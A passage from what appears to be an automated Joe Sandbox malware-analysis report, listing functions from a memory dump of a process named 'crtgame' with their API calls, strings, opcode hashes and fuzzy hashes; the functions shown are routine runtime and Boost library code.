Opcode Fuzzy Hash: 0adaeaa7d3e94b59f3a182b23567b3a46fb4c5e0dd0bc10d128faa8320261d4a
Instruction Fuzzy Hash: 36F0D671A403146FDB616F74A909B6B77ACDF85601B000A69F90DE3140E771DA949BD1

Function 02C34030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C34035
GetProcessHeap.KERNEL32(00000000,02C3A5D9,?,?,?,?,?,02C3A5D9), ref: 02C34042
RtlAllocateHeap.NTDLL(00000000), ref: 02C34049
std::exception::exception.LIBCMT ref: 02C34063

Part of subcall function 02C3A069: __EH_prolog.LIBCMT ref: 02C3A06E
Part of subcall function 02C3A069: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C3A07D
Part of subcall function 02C3A069: __CxxThrowException@8.LIBCMT ref: 02C3A09C

Strings

bad allocation, xrefs: 02C34058

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
String ID: bad allocation
API String ID: 3112922283-2104205924
Opcode ID: f48eeafc89ef401c3207bb5f9b3fbd5a566dd3fe2f6ec48d8a3d1f37cb4d6efb
Instruction ID: fcff82a93ee1fd218d721044986ebd29b9fb94676d2b43beb2e5d95e11703783
Opcode Fuzzy Hash: f48eeafc89ef401c3207bb5f9b3fbd5a566dd3fe2f6ec48d8a3d1f37cb4d6efb
Instruction Fuzzy Hash: 2BF05EB1E442199BDB11AFE0D908BAFBB79EF04301F404645E915A2280DB7582948F95

Function 02C416A0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C41470: CloseHandle.KERNEL32(00000000,6BE866C2), ref: 02C414C1
Part of subcall function 02C41470: WaitForSingleObject.KERNEL32(?,000000FF,6BE866C2,?,?,?,?,6BE866C2,02C41443,6BE866C2), ref: 02C414D8

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C4173E
ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C4175E
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C41797
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C417EB
SetEvent.KERNEL32(?), ref: 02C417F2

Part of subcall function 02C3418C: CloseHandle.KERNEL32(00000000,?,02C41725), ref: 02C341B0

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
String ID:
API String ID: 4166353394-0
Opcode ID: 5b923cb91375bb6e03a594fb9bd516264fbebe8220333e52ba7c341b0500b202
Instruction ID: 057272fc013eea9c17a9c76ca4299813cb9828050b195ef586d43132640e12c7
Opcode Fuzzy Hash: 5b923cb91375bb6e03a594fb9bd516264fbebe8220333e52ba7c341b0500b202
Instruction Fuzzy Hash: AC41D2706403118BEB259F18CC80B1777E8EF85764F180668EC5CEB295DB78D985CBA5

Function 02C3DA97 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3DA9C

Part of subcall function 02C31A01: TlsGetValue.KERNEL32 ref: 02C31A0A

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C3DB1B
RtlEnterCriticalSection.NTDLL(?), ref: 02C3DB37
InterlockedIncrement.KERNEL32(02C65170), ref: 02C3DB5C
RtlLeaveCriticalSection.NTDLL(?), ref: 02C3DB71

Part of subcall function 02C327F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C3284E

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
String ID:
API String ID: 1578506061-0
Opcode ID: 73fd0da879fdedaee729198aa11dec1b660e2a026f5b68ac29acf7b4ee2cbef0
Instruction ID: 6209a6f1c21861dcdd0f1a43a4a0f6872ba2b1ee56ac7433015621d7a5f5d4ed
Opcode Fuzzy Hash: 73fd0da879fdedaee729198aa11dec1b660e2a026f5b68ac29acf7b4ee2cbef0
Instruction Fuzzy Hash: AF3148B19013149FCB11DFA9C4446AEBBF8FF48314F04895EE84AE7641E774A644CFA0

Function 02C321D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C321DA
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C321ED
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C32224
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C32237
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C32261

Part of subcall function 02C32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C32350
Part of subcall function 02C32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C32360
Part of subcall function 02C32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C32370
Part of subcall function 02C32341: GetLastError.KERNEL32 ref: 02C3237A

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: 2537ad3aad9be04ca32d0c0a20c320b69a1def8875af83e02409d7aa874ecf4d
Instruction ID: c8bd49cb6ef17a84362e28b68cb73947478f720a08adee1350dda4a844c3f059
Opcode Fuzzy Hash: 2537ad3aad9be04ca32d0c0a20c320b69a1def8875af83e02409d7aa874ecf4d
Instruction Fuzzy Hash: AE117271D04215DBCF129FA5EC086AEFFBAFF84320F104A1AEC15A2250D7718A95DF81

Function 02C32298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3229D
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C322B0
TlsGetValue.KERNEL32 ref: 02C322E7
TlsSetValue.KERNEL32(?), ref: 02C32300
TlsSetValue.KERNEL32(?,?,?), ref: 02C3231C

Part of subcall function 02C32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C32350
Part of subcall function 02C32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C32360
Part of subcall function 02C32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C32370
Part of subcall function 02C32341: GetLastError.KERNEL32 ref: 02C3237A

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: 9b16c169ce534ea080a42a45b944ae40654efc83a4fcb26174bdea1b240a5715
Instruction ID: 206e94fb85c6a02eb3b628cc6d0df4bfc5d53bd31a1fbd230af22ebdc873546d
Opcode Fuzzy Hash: 9b16c169ce534ea080a42a45b944ae40654efc83a4fcb26174bdea1b240a5715
Instruction Fuzzy Hash: D0111C72D002299BCF069FA5EC046AEFFBAFF84310F10895AE805A3250DB718A55DF91

Function 02C3B6B1 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02C3AB04: __EH_prolog.LIBCMT ref: 02C3AB09

__CxxThrowException@8.LIBCMT ref: 02C3B6CE

Part of subcall function 02C43F7A: RaiseException.KERNEL32(?,?,?,02C60F6C,?,00000400,?,?,?,02C435BD,?,02C60F6C,00000000,00000001), ref: 02C43FCF

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,Function_00030DA4,?,00000001), ref: 02C3B6E4
InterlockedExchange.KERNEL32(?,00000001), ref: 02C3B6F7
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,Function_00030DA4,?,00000001), ref: 02C3B707
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C3B715

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
String ID:
API String ID: 2725315915-0
Opcode ID: 1774534fd57de5a9be7b24a526d99101a9a939e425069fd91f4cd9910dfbefa0
Instruction ID: f3dc2f55ecbec48bfec22df5aaf3a4325b95bbfc7a1d7dbb6d64e91dbaeac997
Opcode Fuzzy Hash: 1774534fd57de5a9be7b24a526d99101a9a939e425069fd91f4cd9910dfbefa0
Instruction Fuzzy Hash: 3F01A9B6A40314AFDB10DBB4DC89F8777EDEF04369F044955F615D7290D760E8548B60

Function 02C32420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C32432
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C32445
RtlEnterCriticalSection.NTDLL(?), ref: 02C32454
InterlockedExchange.KERNEL32(?,00000001), ref: 02C32469
RtlLeaveCriticalSection.NTDLL(?), ref: 02C32470

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
String ID:
API String ID: 747265849-0
Opcode ID: 3e31469abaf9946be417ca297681e2f3b5d164ca4522709e2f57e2b82db4ede7
Instruction ID: 0ed8b0d3754bd1c58a96d411689150b92984faff7e8a5be8c2c6faa605370efe
Opcode Fuzzy Hash: 3e31469abaf9946be417ca297681e2f3b5d164ca4522709e2f57e2b82db4ede7
Instruction Fuzzy Hash: D2F096726402107BDB015BA0DD49FDAB76CFF84711F804811F701E2080D770E9A4CBE1

Function 02C31EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(?), ref: 02C31ED2
PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C31EEA
RtlEnterCriticalSection.NTDLL(?), ref: 02C31EF9
InterlockedExchange.KERNEL32(?,00000001), ref: 02C31F0E
RtlLeaveCriticalSection.NTDLL(?), ref: 02C31F15

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
String ID:
API String ID: 830998967-0
Opcode ID: 2a11787998ebb8140fe0664ffa118826d651e74dcdec2b127fda2331f68b7356
Instruction ID: b961ea43d19028ce75f46e48abfcebb2e98938492b722d0df5709cf06ce07067
Opcode Fuzzy Hash: 2a11787998ebb8140fe0664ffa118826d651e74dcdec2b127fda2331f68b7356
Instruction Fuzzy Hash: C0F01D72641615BBDB41AFA1ED88FCAB76CFF84351F000512F60592440DB61E6A9CBE0

Function 02C330AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C330C3
WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C33102
_memcmp.LIBCMT ref: 02C33141

Strings

255.255.255.255, xrefs: 02C33139

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AddressErrorLastString_memcmp
String ID: 255.255.255.255
API String ID: 1618111833-2422070025
Opcode ID: e6385e4a1e6089f1cde96715fbdeaa1393fea68ae6d6d0f0e9aaca0d5487abf1
Instruction ID: 5252003882f43bdd5d15f8c9ebf51c8679630a5c0f6e0181552c840e0b1488a8
Opcode Fuzzy Hash: e6385e4a1e6089f1cde96715fbdeaa1393fea68ae6d6d0f0e9aaca0d5487abf1
Instruction Fuzzy Hash: 3A31C4729003489FDB219F64CC8076FB7A6EF85324F1049ADED559B280DB719A45CFD0

Function 02C3C743 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3C748

Part of subcall function 02C3CD06: std::exception::exception.LIBCMT ref: 02C3CD33

Part of subcall function 02C3D51C: __EH_prolog.LIBCMT ref: 02C3D521

Part of subcall function 02C4356D: _malloc.LIBCMT ref: 02C43585

Part of subcall function 02C3CD63: __EH_prolog.LIBCMT ref: 02C3CD68

Strings

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C3C77E
C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C3C785
8lm, xrefs: 02C3C774, 02C3C804

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: 8lm$C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 1953324306-211672559
Opcode ID: ca135d056224eaee0db34cd3ee9c7f561f013ef754b67ac11e3b1591a11c2258
Instruction ID: 930e01be4ee4fb8d55c7a7691435948ece6ea70b81012e63a74234031b11c09c
Opcode Fuzzy Hash: ca135d056224eaee0db34cd3ee9c7f561f013ef754b67ac11e3b1591a11c2258
Instruction Fuzzy Hash: D721A0B1E002549ADB15EFA4D848BAEBBB5EF44704F00495EEC06A7280DB709A48DF91

Function 02C31F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C31F5B
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C31FC5
GetLastError.KERNEL32(?,00000000), ref: 02C31FD2

Part of subcall function 02C31712: __EH_prolog.LIBCMT ref: 02C31717

Strings

iocp, xrefs: 02C31FE0

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$CompletionCreateErrorLastPort
String ID: iocp
API String ID: 998023749-976528080
Opcode ID: 0fc60bb16d00c9595b260fae2a5581bc2baf3b589b0260118d53d85238ac801f
Instruction ID: 5984bca06c2136f585f0cbe05b8f1bd30c6236d5834d26db3f59eea4e2a5dfcc
Opcode Fuzzy Hash: 0fc60bb16d00c9595b260fae2a5581bc2baf3b589b0260118d53d85238ac801f
Instruction Fuzzy Hash: E121F7B1801B549FC720DF6AD50055BFBF8FFA4720B108A1FD8A693A90D7B0A684CF91

Function 02C4356D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C43585

Part of subcall function 02C429CC: __FF_MSGBANNER.LIBCMT ref: 02C429E3
Part of subcall function 02C429CC: __NMSG_WRITE.LIBCMT ref: 02C429EA
Part of subcall function 02C429CC: RtlAllocateHeap.NTDLL(006C0000,00000000,00000001), ref: 02C42A0F

std::exception::exception.LIBCMT ref: 02C435A3
__CxxThrowException@8.LIBCMT ref: 02C435B8

Part of subcall function 02C43F7A: RaiseException.KERNEL32(?,?,?,02C60F6C,?,00000400,?,?,?,02C435BD,?,02C60F6C,00000000,00000001), ref: 02C43FCF

Strings

bad allocation, xrefs: 02C43598

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: 1332cb367d3ef35dc37f0b718b2858d80a30fc3903169309a3cfe78649b06f3e
Instruction ID: f5f7346dd38247804eb5c44e1620a46b2cab9f6236523d3648cce2fed68f7300
Opcode Fuzzy Hash: 1332cb367d3ef35dc37f0b718b2858d80a30fc3903169309a3cfe78649b06f3e
Instruction Fuzzy Hash: 05E0A07090020AAAEF00AAA4DD089AFBB69AF40310F5006E5AC05A2190DF71DB44D9E1

Function 02C337B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C337B6
__localtime64.LIBCMT ref: 02C337C1

Part of subcall function 02C42020: __gmtime64_s.LIBCMT ref: 02C42033

std::exception::exception.LIBCMT ref: 02C337D9

Part of subcall function 02C41EF3: std::exception::_Copy_str.LIBCMT ref: 02C41F0C

Part of subcall function 02C39EC7: __EH_prolog.LIBCMT ref: 02C39ECC
Part of subcall function 02C39EC7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C39EDB
Part of subcall function 02C39EC7: __CxxThrowException@8.LIBCMT ref: 02C39EFA

Strings

could not convert calendar time to UTC time, xrefs: 02C337CE

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
String ID: could not convert calendar time to UTC time
API String ID: 1963798777-2088861013
Opcode ID: 758cebc9a743fe29c440fac6581d361d3b1f6f2f615d06d72cd14f4d5f86dcb7
Instruction ID: c9715d770a5c3183ecdf80025239ece1e2ce199f2b36311f92343f803c34a9ad
Opcode Fuzzy Hash: 758cebc9a743fe29c440fac6581d361d3b1f6f2f615d06d72cd14f4d5f86dcb7
Instruction Fuzzy Hash: 78E06DB1D002999ACF15EF94D9047AFB7B9FF00304F004999DC15A2640DB759A85DF95

Function 02C40D40 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C34149), ref: 02C40DDF

Part of subcall function 02C33FDC: __EH_prolog.LIBCMT ref: 02C33FE1
Part of subcall function 02C33FDC: CreateEventA.KERNEL32(00000000,02C3A5D9,?,00000000), ref: 02C33FF3

CloseHandle.KERNEL32(00000000), ref: 02C40DD4
CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C34149), ref: 02C40E20
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C34149), ref: 02C40EF1

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$CreateH_prolog
String ID:
API String ID: 2825413587-0
Opcode ID: d51d712fdbef4b80dece84a4f2d138606367a052bf07fcc5d5892dbbc6854579
Instruction ID: 6356b9e7f8d8a18d78ee0d045c871dc5e3907f345cd11e58e4d153ef182ac9ca
Opcode Fuzzy Hash: d51d712fdbef4b80dece84a4f2d138606367a052bf07fcc5d5892dbbc6854579
Instruction Fuzzy Hash: 1851D3719403858BDB15DF28C88479BB7E4BF88328F190618E9A9A7380DB35E955CB91

Function 02C4F935 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C4F96B
__isleadbyte_l.LIBCMT ref: 02C4F999
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C4F9C7
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C4F9FD

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0e19221a7bff878b3c7d892203b329b21a975f0fd01d2f9e2443b62f0b4f6c57
Instruction ID: 88e7937a0967815458bd7c78864effcd0a19dd2b34d9bf8ef1ff6a9d6835a118
Opcode Fuzzy Hash: 0e19221a7bff878b3c7d892203b329b21a975f0fd01d2f9e2443b62f0b4f6c57
Instruction Fuzzy Hash: 7131CD31600246BFDF218E35CC44BBB7BA6FF81324F16442EE865975A0EB30E990DB90

Function 02C4FDC4 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C4FDD0

Part of subcall function 02C429CC: __FF_MSGBANNER.LIBCMT ref: 02C429E3
Part of subcall function 02C429CC: __NMSG_WRITE.LIBCMT ref: 02C429EA
Part of subcall function 02C429CC: RtlAllocateHeap.NTDLL(006C0000,00000000,00000001), ref: 02C42A0F

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 3467be2b5a4194207e70092c9c4308450b760824758e95cf7e8f49c3fc771c17
Instruction ID: 406d55b826d840f919e2dfcd7735d5a11d4697a759e971684f83ca7c9ea72f34
Opcode Fuzzy Hash: 3467be2b5a4194207e70092c9c4308450b760824758e95cf7e8f49c3fc771c17
Instruction Fuzzy Hash: 08110632C44712AFDB212F71AC0875B779A9F503A2B10492DE94D97690DF34C580DAE5

Function 02C41DA3 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C41DB2
___ascii_stricmp.LIBCMT ref: 02C41DEA
__tolower_l.LIBCMT ref: 02C41E00

Part of subcall function 02C4539A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C453A8
Part of subcall function 02C4539A: __isctype_l.LIBCMT ref: 02C453C9

__tolower_l.LIBCMT ref: 02C41E0F

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
String ID:
API String ID: 2995433114-0
Opcode ID: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
Instruction ID: d88e3cf35e827b19eb1d041932e78b85c1c6c0aae8906a1457cded03d3ca6731
Opcode Fuzzy Hash: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
Instruction Fuzzy Hash: 26112C729001156FD721AA79CC88BBB77A9FB41364F1C0758E4A9571C0EFB05E40DB90

Function 02C33D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 02C33DA2

Part of subcall function 02C33BD3: __EH_prolog.LIBCMT ref: 02C33BD8
Part of subcall function 02C33BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C33BED

htonl.WS2_32(00000000), ref: 02C33DB9
htonl.WS2_32(00000000), ref: 02C33DC0
htons.WS2_32(?), ref: 02C33DD4

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
String ID:
API String ID: 3882411702-0
Opcode ID: 86b1578c0a2beacf1d0b8e8b3d8fb096a3fbedbc066a30597f2a562085d1f4eb
Instruction ID: 4b35f9af7956326a1c762c63a26740359f70013b6bb45f762fe37d2101e150ca
Opcode Fuzzy Hash: 86b1578c0a2beacf1d0b8e8b3d8fb096a3fbedbc066a30597f2a562085d1f4eb
Instruction Fuzzy Hash: 2311A035910348EBCF019F64D885A5AB7B9EF08310B008896FC08DF204D671DA94CBA1

Function 02C3239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C3335F,?,?,?,?,?), ref: 02C323D0
RtlEnterCriticalSection.NTDLL(?), ref: 02C323DE
InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C32401
RtlLeaveCriticalSection.NTDLL(?), ref: 02C32408

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: 5cfe2c664a448eea2536ae96917eaa857b32ffe2d277b88297bba1f1007d94ce
Instruction ID: 19e3d17b2200cc82734ae2b0ee255269df79874467caff23f8d053848f50426c
Opcode Fuzzy Hash: 5cfe2c664a448eea2536ae96917eaa857b32ffe2d277b88297bba1f1007d94ce
Instruction Fuzzy Hash: FE11CE71600305ABDB219F60C984BAABBB8FF80704F1048ADF9019B140DBB1EE85CBA1

Function 02C4C25B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02C4C27F

Part of subcall function 02C4C966: __fltout2.LIBCMT ref: 02C4C98F

__cftog_l.LIBCMT ref: 02C4C2A5
__cftoe_l.LIBCMT ref: 02C4C2D7

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: d202d614a3cc5241f07ebd3137541041b8dc874a215902fd4b05c542ac32c672
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0B01493204114ABBCF226EC4CC41CEE3F63BB59754B498416FE28A9131CB77C6B1AB81

Function 02C3247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C324A9
RtlEnterCriticalSection.NTDLL(?), ref: 02C324B8
InterlockedExchange.KERNEL32(?,00000001), ref: 02C324CD
RtlLeaveCriticalSection.NTDLL(?), ref: 02C324D4

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: d3a07d2a449c0375d3f48e42939bbf644b0e06bd66189ff674874e7caef41642
Instruction ID: 7a4ef956dadaf69e06c0111e09e3907120bbd3c4750716abdde59303c7d71eb8
Opcode Fuzzy Hash: d3a07d2a449c0375d3f48e42939bbf644b0e06bd66189ff674874e7caef41642
